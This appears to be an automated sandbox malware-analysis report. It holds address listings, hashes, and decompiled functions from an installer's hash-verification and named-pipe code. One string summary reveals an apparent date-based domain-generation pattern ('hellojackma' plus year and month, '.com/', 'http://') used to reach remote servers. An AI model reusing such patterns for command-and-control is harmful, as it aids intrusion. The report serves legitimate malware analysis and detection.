                                                                                                                                                                  0x10022773
                                                                                                                                                                  0x1002277b
                                                                                                                                                                  0x1002277e
                                                                                                                                                                  0x10022781
                                                                                                                                                                  0x10022784
                                                                                                                                                                  0x1002278c
                                                                                                                                                                  0x10022795
                                                                                                                                                                  0x1002279b
                                                                                                                                                                  0x100227a2
                                                                                                                                                                  0x100227ae
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100227b9
                                                                                                                                                                  0x100227cb
                                                                                                                                                                  0x100227e2
                                                                                                                                                                  0x100227f4
                                                                                                                                                                  0x10022800
                                                                                                                                                                  0x10022806
                                                                                                                                                                  0x10022817
                                                                                                                                                                  0x1002281c
                                                                                                                                                                  0x10022826
                                                                                                                                                                  0x1002282e
                                                                                                                                                                  0x1002282f
                                                                                                                                                                  0x10022847
                                                                                                                                                                  0x10022853
                                                                                                                                                                  0x10022859
                                                                                                                                                                  0x1002286a
                                                                                                                                                                  0x1002286f
                                                                                                                                                                  0x10022879
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022883
                                                                                                                                                                  0x10022887
                                                                                                                                                                  0x10022888
                                                                                                                                                                  0x10022892
                                                                                                                                                                  0x100228a1
                                                                                                                                                                  0x100228b0
                                                                                                                                                                  0x100228b3
                                                                                                                                                                  0x100228b7
                                                                                                                                                                  0x100228c2
                                                                                                                                                                  0x100228c8
                                                                                                                                                                  0x100228ce
                                                                                                                                                                  0x100228d4
                                                                                                                                                                  0x100228d8
                                                                                                                                                                  0x100228df
                                                                                                                                                                  0x100228e5
                                                                                                                                                                  0x100228ea
                                                                                                                                                                  0x100228ee
                                                                                                                                                                  0x100228f4
                                                                                                                                                                  0x100228f9
                                                                                                                                                                  0x100228fc
                                                                                                                                                                  0x100228fd
                                                                                                                                                                  0x10022902
                                                                                                                                                                  0x1002290a
                                                                                                                                                                  0x10022915
                                                                                                                                                                  0x1002291b
                                                                                                                                                                  0x10022921
                                                                                                                                                                  0x10022927
                                                                                                                                                                  0x1002292b
                                                                                                                                                                  0x10022932
                                                                                                                                                                  0x10022938
                                                                                                                                                                  0x1002293d
                                                                                                                                                                  0x10022941
                                                                                                                                                                  0x10022947
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022951
                                                                                                                                                                  0x10022955
                                                                                                                                                                  0x10022956
                                                                                                                                                                  0x10022967
                                                                                                                                                                  0x1002296f
                                                                                                                                                                  0x1002297e
                                                                                                                                                                  0x10022981
                                                                                                                                                                  0x10022985
                                                                                                                                                                  0x10022990
                                                                                                                                                                  0x10022996
                                                                                                                                                                  0x1002299c
                                                                                                                                                                  0x100229a2
                                                                                                                                                                  0x100229a6
                                                                                                                                                                  0x100229ad
                                                                                                                                                                  0x100229b3
                                                                                                                                                                  0x100229b8
                                                                                                                                                                  0x100229bc
                                                                                                                                                                  0x100229c2
                                                                                                                                                                  0x100229c7
                                                                                                                                                                  0x100229ca
                                                                                                                                                                  0x100229cb
                                                                                                                                                                  0x100229d0
                                                                                                                                                                  0x100229d8
                                                                                                                                                                  0x100229e3
                                                                                                                                                                  0x100229e9
                                                                                                                                                                  0x100229ef
                                                                                                                                                                  0x100229f5
                                                                                                                                                                  0x100229f9
                                                                                                                                                                  0x10022a00
                                                                                                                                                                  0x10022a06
                                                                                                                                                                  0x10022a0b
                                                                                                                                                                  0x10022a0f
                                                                                                                                                                  0x10022a15
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022a1f
                                                                                                                                                                  0x10022a23
                                                                                                                                                                  0x10022a24
                                                                                                                                                                  0x10022a2e
                                                                                                                                                                  0x10022a35
                                                                                                                                                                  0x10022a3d
                                                                                                                                                                  0x10022a4c
                                                                                                                                                                  0x10022a4f
                                                                                                                                                                  0x10022a53
                                                                                                                                                                  0x10022a5e
                                                                                                                                                                  0x10022a64
                                                                                                                                                                  0x10022a6a
                                                                                                                                                                  0x10022a70
                                                                                                                                                                  0x10022a74
                                                                                                                                                                  0x10022a7b
                                                                                                                                                                  0x10022a81
                                                                                                                                                                  0x10022a86
                                                                                                                                                                  0x10022a8a
                                                                                                                                                                  0x10022a95
                                                                                                                                                                  0x10022a98
                                                                                                                                                                  0x10022a99
                                                                                                                                                                  0x10022a9e
                                                                                                                                                                  0x10022aa6
                                                                                                                                                                  0x10022ab1
                                                                                                                                                                  0x10022ab7
                                                                                                                                                                  0x10022abd
                                                                                                                                                                  0x10022ac3
                                                                                                                                                                  0x10022ac7
                                                                                                                                                                  0x10022ace
                                                                                                                                                                  0x10022ad4
                                                                                                                                                                  0x10022ad9
                                                                                                                                                                  0x10022add
                                                                                                                                                                  0x10022ae3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022aed
                                                                                                                                                                  0x10022af1
                                                                                                                                                                  0x10022af2
                                                                                                                                                                  0x10022afc
                                                                                                                                                                  0x10022b0b
                                                                                                                                                                  0x10022b1a
                                                                                                                                                                  0x10022b1d
                                                                                                                                                                  0x10022b21
                                                                                                                                                                  0x10022b2c
                                                                                                                                                                  0x10022b32
                                                                                                                                                                  0x10022b38
                                                                                                                                                                  0x10022b3e
                                                                                                                                                                  0x10022b42
                                                                                                                                                                  0x10022b49
                                                                                                                                                                  0x10022b4f
                                                                                                                                                                  0x10022b54
                                                                                                                                                                  0x10022b58
                                                                                                                                                                  0x10022b5e
                                                                                                                                                                  0x10022b63
                                                                                                                                                                  0x10022b66
                                                                                                                                                                  0x10022b67
                                                                                                                                                                  0x10022b6c
                                                                                                                                                                  0x10022b74
                                                                                                                                                                  0x10022b7f
                                                                                                                                                                  0x10022b85
                                                                                                                                                                  0x10022b8b
                                                                                                                                                                  0x10022b91
                                                                                                                                                                  0x10022b95
                                                                                                                                                                  0x10022b9c
                                                                                                                                                                  0x10022ba2
                                                                                                                                                                  0x10022ba7
                                                                                                                                                                  0x10022bab
                                                                                                                                                                  0x10022bb1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022bbb
                                                                                                                                                                  0x10022bbf
                                                                                                                                                                  0x10022bc0
                                                                                                                                                                  0x10022bd1
                                                                                                                                                                  0x10022bd9
                                                                                                                                                                  0x10022be8
                                                                                                                                                                  0x10022beb
                                                                                                                                                                  0x10022bef
                                                                                                                                                                  0x10022bfa
                                                                                                                                                                  0x10022c00
                                                                                                                                                                  0x10022c06
                                                                                                                                                                  0x10022c0c
                                                                                                                                                                  0x10022c10
                                                                                                                                                                  0x10022c17
                                                                                                                                                                  0x10022c1d
                                                                                                                                                                  0x10022c22
                                                                                                                                                                  0x10022c26
                                                                                                                                                                  0x10022c2c
                                                                                                                                                                  0x10022c31
                                                                                                                                                                  0x10022c34
                                                                                                                                                                  0x10022c35
                                                                                                                                                                  0x10022c3a
                                                                                                                                                                  0x10022c42
                                                                                                                                                                  0x10022c4d
                                                                                                                                                                  0x10022c53
                                                                                                                                                                  0x10022c59
                                                                                                                                                                  0x10022c5f
                                                                                                                                                                  0x10022c63
                                                                                                                                                                  0x10022c6a
                                                                                                                                                                  0x10022c70
                                                                                                                                                                  0x10022c75
                                                                                                                                                                  0x10022c79
                                                                                                                                                                  0x10022c7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022c8b
                                                                                                                                                                  0x10022c91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100227ae
                                                                                                                                                                  0x10022c96
                                                                                                                                                                  0x10022ca0
                                                                                                                                                                  0x10022cae
                                                                                                                                                                  0x10022cb4
                                                                                                                                                                  0x10022cc1
                                                                                                                                                                  0x10022ccc
                                                                                                                                                                  0x10022cd6

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _sprintf$LocalTime_memset
                                                                                                                                                                  • String ID: .com/$.com/$.com/$.com/$.com/$hellojackma%04d%02d$hellojackma%04d%02d1$hellojackma%04d%02d2$hellojackma%04d%02d3$hellojackma%04d%02d4$http://
                                                                                                                                                                  • API String ID: 3210278488-2045531967
                                                                                                                                                                  • Opcode ID: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
                                                                                                                                                                  • Instruction ID: fb4cb11577b3c86e7dfd5e3107c57607ba699950bdf5b0f3fc4b2b3aa76d18be
                                                                                                                                                                  • Opcode Fuzzy Hash: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
                                                                                                                                                                  • Instruction Fuzzy Hash: E3D137B5C012689BEB24DBA4CC85BEEB7B4FF59340F5041D9E10967291EB346B84CF92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412B6A, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 222encryptionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E00412B6A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _EXCEPTION_POINTERS _v24;
				signed int _v28;
				signed short* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v52;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				void _v92;
				signed int _v100;
				void* _v104;
				intOrPtr _v108;
				signed short* _v112;
				void* _v116;
				intOrPtr _v120;
				void _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				void* _t69;
				signed short* _t72;
				signed short _t74;
				signed short _t77;
				signed short _t78;
				signed short _t92;
				signed short _t103;
				void* _t107;
				void* _t109;
				signed short _t110;
				signed short _t111;
				intOrPtr _t112;
				intOrPtr _t114;
				signed int _t116;
				void* _t124;
				void* _t127;
				signed short _t136;
				signed short _t139;
				signed short _t142;
				signed short _t145;
				signed int _t146;

				_t64 =  *0x4560d0; // 0xae480e18
				_v8 = _t64 ^ _t146;
				_t112 = _a12;
				_t128 = _a8;
				_push(0x30);
				_push(0);
				_push( &_v92);
				_v44 = _a8;
				_v40 = _t112;
				E004267C0(_t112, __ecx, _t124, _a8, __eflags);
				_t116 = 9;
				_t69 = memset( &_v128, 0, _t116 << 2);
				_v32 = _t69;
				_v36 = _t69;
				_v28 = _t69;
				_t127 = _t69;
				_v24 = 0xaac56b;
				_v20 = 0x11d0cd44;
				_v16 = 0xc000c28c;
				_v12 = 0xee95c24f;
				if(E00433F88( &_v32, _t128, 0) >= 0) {
					_t72 = _v32;
					while(1) {
						__eflags = 0 -  *_t72;
						if(0 ==  *_t72) {
							break;
						}
						 *_t72 =  *_t72 + 0x20;
						__eflags =  *_t72;
						_t72 =  &(_t72[1]);
					}
					_push(0);
					_push(0);
					_push( &_v28);
					_push(_t112);
					L0042FF8E();
					_t74 = GetLastError();
					__eflags = _t74 - 0x7a;
					if(_t74 != 0x7a) {
						__eflags = _t74;
						if(_t74 == 0) {
							goto L11;
						} else {
							__eflags = _t74;
							_t142 =  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
							_t107 = 0x80004005;
							__eflags = _t142;
							_t133 =  >=  ? 0x80004005 : _t142;
							_push(_t133);
							_push(0x67b);
							goto L8;
						}
					} else {
						_t109 = E00431078(_v28, 1);
						_push(0);
						_t127 = _t109;
						_push(_t127);
						_t110 =  &_v28;
						_push(_t110);
						_push(_t112);
						L0042FF8E();
						__eflags = _t110;
						if(_t110 != 0) {
							L11:
							_t113 = 1 + _v28 * 2;
							_t77 = E00433BDF( &_v36, 1 + _v28 * 2);
							__eflags = _t77;
							if(_t77 >= 0) {
								_t78 = E004344B6(0, _t127, _v28, _v36, _t113);
								__eflags = _t78;
								if(_t78 >= 0) {
									_v68 =  &_v128;
									_v100 = _v28;
									_v108 = _v40;
									_v116 = _v36;
									_v112 = _v32;
									_t114 = 2;
									_v92 = 0x30;
									_v80 = _t114;
									_v72 = _t114;
									_v64 = 1;
									_v52 = 0x80;
									_v128 = 0x24;
									_v104 = _t127;
									_v120 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
									_t133 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
									__eflags = _t133;
									if(_t133 == 0) {
										L18:
										_v64 = _t114;
										_t92 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
										__eflags = _t92;
										if(_t92 != 0) {
											__eflags = _t92;
											_t136 =  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
											__eflags = _t136;
											_t133 =  >=  ? 0x80004005 : _t136;
											E004300D9(0x80004005, "cache.cpp", 0x6a6, _t133);
											_push("Could not close verify handle.");
											goto L20;
										}
									} else {
										_v52 = _v52 | 0x00001000;
										_t103 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
										__eflags = _t103;
										if(_t103 == 0) {
											goto L18;
										} else {
											__eflags = _t103;
											_t139 =  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
											__eflags = _t139;
											_t133 =  >=  ? 0x80004005 : _t139;
											E004300D9(0x80004005, "cache.cpp", 0x6a0,  >=  ? 0x80004005 : _t139);
											E00430A57( >=  ? 0x80004005 : _t139, "Could not verify file %ls.", _v44);
										}
									}
								} else {
									_push("Failed to encode file hash.");
									goto L20;
								}
							} else {
								_push("Failed to allocate string.");
								goto L20;
							}
						} else {
							_t111 = GetLastError();
							__eflags = _t111;
							_t145 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
							_t107 = 0x80004005;
							__eflags = _t145;
							_t133 =  >=  ? 0x80004005 : _t145;
							_push(_t133);
							_push(0x676);
							L8:
							_push("cache.cpp");
							E004300D9(_t107);
							_push("Failed to get file hash.");
							goto L20;
						}
					}
				} else {
					_push("Failed to allocate memory");
					L20:
					_push(_t133);
					E00430A57();
				}
				if(_v32 != 0) {
					E004380AB(_v32);
				}
				if(_v36 != 0) {
					E004380AB(_v36);
				}
				if(_t127 != 0) {
					E00431137(_t127);
				}
				return L004267AF(_t133, _v8 ^ _t146, _t127, _t133);
			}



















































                                                                                                                                                                  0x00412b70
                                                                                                                                                                  0x00412b77
                                                                                                                                                                  0x00412b7b
                                                                                                                                                                  0x00412b7f
                                                                                                                                                                  0x00412b83
                                                                                                                                                                  0x00412b88
                                                                                                                                                                  0x00412b8a
                                                                                                                                                                  0x00412b8b
                                                                                                                                                                  0x00412b8e
                                                                                                                                                                  0x00412b91
                                                                                                                                                                  0x00412b9d
                                                                                                                                                                  0x00412ba2
                                                                                                                                                                  0x00412ba4
                                                                                                                                                                  0x00412ba7
                                                                                                                                                                  0x00412baa
                                                                                                                                                                  0x00412bad
                                                                                                                                                                  0x00412bb4
                                                                                                                                                                  0x00412bbb
                                                                                                                                                                  0x00412bc2
                                                                                                                                                                  0x00412bc9
                                                                                                                                                                  0x00412bd9
                                                                                                                                                                  0x00412be5
                                                                                                                                                                  0x00412bf1
                                                                                                                                                                  0x00412bf3
                                                                                                                                                                  0x00412bf6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412bea
                                                                                                                                                                  0x00412bea
                                                                                                                                                                  0x00412bee
                                                                                                                                                                  0x00412bee
                                                                                                                                                                  0x00412bf8
                                                                                                                                                                  0x00412bf9
                                                                                                                                                                  0x00412bfd
                                                                                                                                                                  0x00412bfe
                                                                                                                                                                  0x00412bff
                                                                                                                                                                  0x00412c0a
                                                                                                                                                                  0x00412c0c
                                                                                                                                                                  0x00412c0f
                                                                                                                                                                  0x00412c62
                                                                                                                                                                  0x00412c64
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412c66
                                                                                                                                                                  0x00412c6f
                                                                                                                                                                  0x00412c71
                                                                                                                                                                  0x00412c74
                                                                                                                                                                  0x00412c79
                                                                                                                                                                  0x00412c7b
                                                                                                                                                                  0x00412c7e
                                                                                                                                                                  0x00412c7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412c7f
                                                                                                                                                                  0x00412c11
                                                                                                                                                                  0x00412c16
                                                                                                                                                                  0x00412c1b
                                                                                                                                                                  0x00412c1d
                                                                                                                                                                  0x00412c1f
                                                                                                                                                                  0x00412c20
                                                                                                                                                                  0x00412c23
                                                                                                                                                                  0x00412c24
                                                                                                                                                                  0x00412c25
                                                                                                                                                                  0x00412c2a
                                                                                                                                                                  0x00412c2c
                                                                                                                                                                  0x00412c86
                                                                                                                                                                  0x00412c89
                                                                                                                                                                  0x00412c95
                                                                                                                                                                  0x00412c9c
                                                                                                                                                                  0x00412c9e
                                                                                                                                                                  0x00412cb2
                                                                                                                                                                  0x00412cb9
                                                                                                                                                                  0x00412cbb
                                                                                                                                                                  0x00412cca
                                                                                                                                                                  0x00412cd0
                                                                                                                                                                  0x00412cd6
                                                                                                                                                                  0x00412cdc
                                                                                                                                                                  0x00412ce2
                                                                                                                                                                  0x00412ced
                                                                                                                                                                  0x00412cee
                                                                                                                                                                  0x00412cf5
                                                                                                                                                                  0x00412cf8
                                                                                                                                                                  0x00412cfb
                                                                                                                                                                  0x00412d02
                                                                                                                                                                  0x00412d09
                                                                                                                                                                  0x00412d10
                                                                                                                                                                  0x00412d16
                                                                                                                                                                  0x00412d28
                                                                                                                                                                  0x00412d2a
                                                                                                                                                                  0x00412d2c
                                                                                                                                                                  0x00412d83
                                                                                                                                                                  0x00412d8d
                                                                                                                                                                  0x00412d90
                                                                                                                                                                  0x00412d95
                                                                                                                                                                  0x00412d97
                                                                                                                                                                  0x00412da2
                                                                                                                                                                  0x00412da4
                                                                                                                                                                  0x00412dac
                                                                                                                                                                  0x00412dae
                                                                                                                                                                  0x00412dbc
                                                                                                                                                                  0x00412dc1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412dc1
                                                                                                                                                                  0x00412d2e
                                                                                                                                                                  0x00412d2e
                                                                                                                                                                  0x00412d3f
                                                                                                                                                                  0x00412d44
                                                                                                                                                                  0x00412d46
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412d48
                                                                                                                                                                  0x00412d51
                                                                                                                                                                  0x00412d53
                                                                                                                                                                  0x00412d5b
                                                                                                                                                                  0x00412d5d
                                                                                                                                                                  0x00412d6b
                                                                                                                                                                  0x00412d79
                                                                                                                                                                  0x00412d7e
                                                                                                                                                                  0x00412d46
                                                                                                                                                                  0x00412cbd
                                                                                                                                                                  0x00412cbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412cbd
                                                                                                                                                                  0x00412ca0
                                                                                                                                                                  0x00412ca0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412ca0
                                                                                                                                                                  0x00412c2e
                                                                                                                                                                  0x00412c2e
                                                                                                                                                                  0x00412c39
                                                                                                                                                                  0x00412c3b
                                                                                                                                                                  0x00412c3e
                                                                                                                                                                  0x00412c43
                                                                                                                                                                  0x00412c45
                                                                                                                                                                  0x00412c48
                                                                                                                                                                  0x00412c49
                                                                                                                                                                  0x00412c4e
                                                                                                                                                                  0x00412c4e
                                                                                                                                                                  0x00412c53
                                                                                                                                                                  0x00412c58
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412c58
                                                                                                                                                                  0x00412c2c
                                                                                                                                                                  0x00412bdb
                                                                                                                                                                  0x00412bdb
                                                                                                                                                                  0x00412dc6
                                                                                                                                                                  0x00412dc6
                                                                                                                                                                  0x00412dc7
                                                                                                                                                                  0x00412dcd
                                                                                                                                                                  0x00412dd2
                                                                                                                                                                  0x00412dd7
                                                                                                                                                                  0x00412dd7
                                                                                                                                                                  0x00412de0
                                                                                                                                                                  0x00412de5
                                                                                                                                                                  0x00412de5
                                                                                                                                                                  0x00412dec
                                                                                                                                                                  0x00412def
                                                                                                                                                                  0x00412def
                                                                                                                                                                  0x00412e04

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptCATAdminCalcHashFromFileHandle.WINTRUST(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00412BFF
                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00412C0A
                                                                                                                                                                  • CryptCATAdminCalcHashFromFileHandle.WINTRUST(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 00412C25
                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 00412C2E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdminCalcCryptErrorFileFromHandleHashLast
                                                                                                                                                                  • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                  • API String ID: 2433594094-4263581490
                                                                                                                                                                  • Opcode ID: 8f7b2866a2056cef0eb373a148e026b8abf4646c6de004e37705dfb57d6c35e7
                                                                                                                                                                  • Instruction ID: 7662544fa8d86295eb8ed34580d66d2f83e53cc602963cb2d14e9e8cc6da36ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7b2866a2056cef0eb373a148e026b8abf4646c6de004e37705dfb57d6c35e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A715072D00229AFDB11DBA5DD41BEEB6F8AF08710F11012BF900F7291E77899458BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F31A, Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 160pipeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E0040F31A(intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				long _v8;
				long _v12;
				signed int _v16;
				long _v20;
				long _v24;
				char _v28;
				void* _t37;
				signed short _t45;
				signed short _t50;
				void** _t54;
				signed short _t56;
				void* _t61;
				intOrPtr* _t66;
				void* _t67;

				_v16 = _v16 | 0xffffffff;
				asm("stosd");
				asm("stosd");
				_v12 = 0;
				asm("stosd");
				_v8 = 0;
				if(_a8 != 0) {
					L4:
					_t66 = _a4;
					_t67 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls",  *_t66);
					if(_t67 >= 0) {
						_t34 =  ==  ? 0 :  &_v28;
						_t61 = CreateNamedPipeW(_v8, 0x80003, 0, 1, 0x10000, 0x10000, 1,  ==  ? 0 :  &_v28);
						if(_t61 != 0xffffffff) {
							if(_a8 == 0) {
								_t37 = _v16;
								goto L16;
							} else {
								_t67 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t66);
								if(_t67 >= 0) {
									_t37 = CreateNamedPipeW(_v8, 0x80003, 0, 1, 0x10000, 0x10000, 1, 0);
									if(_t37 != 0xffffffff) {
										L16:
										 *(_t66 + 0x14) = _t37;
										 *(_t66 + 0x10) = _t61;
										 *_a12 =  *_a12 & 0x00000000;
									} else {
										_t45 = GetLastError();
										_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
										_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
										E004300D9(0x80004005, "pipe.cpp", 0x13d, _t67);
										_push(_v8);
										_push("Failed to create pipe: %ls");
										goto L14;
									}
								} else {
									_push( *_t66);
									_push("Failed to allocate full name of cache pipe: %ls");
									L14:
									_push(_t67);
									E00430A57();
									CloseHandle(_t61);
								}
							}
						} else {
							_t50 = GetLastError();
							_t73 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
							_t67 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "pipe.cpp", 0x131, _t67);
							_push(_v8);
							_push("Failed to create pipe: %ls");
							goto L6;
						}
					} else {
						_push( *_t66);
						_push("Failed to allocate full name of pipe: %ls");
						L6:
						_push(_t67);
						E00430A57();
					}
				} else {
					_push(0);
					_t54 =  &_v12;
					_push(_t54);
					_push(1);
					_push(L"D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)");
					L00426628();
					if(_t54 != 0) {
						_v28 = 0xc;
						_v24 = _v12;
						_v20 = 0;
						goto L4;
					} else {
						_t56 = GetLastError();
						_t76 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
						_t67 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "pipe.cpp", 0x121, _t67);
						_push("Failed to create the security descriptor for the connection event and pipe.");
						_push(_t67);
						E00430A57();
					}
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				if(_v12 != 0) {
					LocalFree(_v12);
				}
				return _t67;
			}

















                                                                                                                                                                  0x0040f320
                                                                                                                                                                  0x0040f32c
                                                                                                                                                                  0x0040f32f
                                                                                                                                                                  0x0040f330
                                                                                                                                                                  0x0040f333
                                                                                                                                                                  0x0040f334
                                                                                                                                                                  0x0040f33a
                                                                                                                                                                  0x0040f3a1
                                                                                                                                                                  0x0040f3a1
                                                                                                                                                                  0x0040f3b4
                                                                                                                                                                  0x0040f3bb
                                                                                                                                                                  0x0040f3da
                                                                                                                                                                  0x0040f3f8
                                                                                                                                                                  0x0040f3fd
                                                                                                                                                                  0x0040f43b
                                                                                                                                                                  0x0040f4cd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f441
                                                                                                                                                                  0x0040f451
                                                                                                                                                                  0x0040f458
                                                                                                                                                                  0x0040f47a
                                                                                                                                                                  0x0040f483
                                                                                                                                                                  0x0040f4d0
                                                                                                                                                                  0x0040f4d0
                                                                                                                                                                  0x0040f4d6
                                                                                                                                                                  0x0040f4d9
                                                                                                                                                                  0x0040f485
                                                                                                                                                                  0x0040f485
                                                                                                                                                                  0x0040f496
                                                                                                                                                                  0x0040f4a0
                                                                                                                                                                  0x0040f4ae
                                                                                                                                                                  0x0040f4b3
                                                                                                                                                                  0x0040f4b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f4b6
                                                                                                                                                                  0x0040f45a
                                                                                                                                                                  0x0040f45a
                                                                                                                                                                  0x0040f45c
                                                                                                                                                                  0x0040f4bb
                                                                                                                                                                  0x0040f4bb
                                                                                                                                                                  0x0040f4bc
                                                                                                                                                                  0x0040f4c5
                                                                                                                                                                  0x0040f4c5
                                                                                                                                                                  0x0040f458
                                                                                                                                                                  0x0040f3ff
                                                                                                                                                                  0x0040f3ff
                                                                                                                                                                  0x0040f410
                                                                                                                                                                  0x0040f41a
                                                                                                                                                                  0x0040f428
                                                                                                                                                                  0x0040f42d
                                                                                                                                                                  0x0040f430
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f430
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3bf
                                                                                                                                                                  0x0040f3c4
                                                                                                                                                                  0x0040f3c4
                                                                                                                                                                  0x0040f3c5
                                                                                                                                                                  0x0040f3ca
                                                                                                                                                                  0x0040f33c
                                                                                                                                                                  0x0040f33c
                                                                                                                                                                  0x0040f33d
                                                                                                                                                                  0x0040f340
                                                                                                                                                                  0x0040f341
                                                                                                                                                                  0x0040f343
                                                                                                                                                                  0x0040f348
                                                                                                                                                                  0x0040f34f
                                                                                                                                                                  0x0040f394
                                                                                                                                                                  0x0040f39b
                                                                                                                                                                  0x0040f39e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f351
                                                                                                                                                                  0x0040f351
                                                                                                                                                                  0x0040f362
                                                                                                                                                                  0x0040f36c
                                                                                                                                                                  0x0040f37a
                                                                                                                                                                  0x0040f37f
                                                                                                                                                                  0x0040f384
                                                                                                                                                                  0x0040f385
                                                                                                                                                                  0x0040f38b
                                                                                                                                                                  0x0040f34f
                                                                                                                                                                  0x0040f4e0
                                                                                                                                                                  0x0040f4e5
                                                                                                                                                                  0x0040f4e5
                                                                                                                                                                  0x0040f4ee
                                                                                                                                                                  0x0040f4f3
                                                                                                                                                                  0x0040f4f3
                                                                                                                                                                  0x0040f4ff

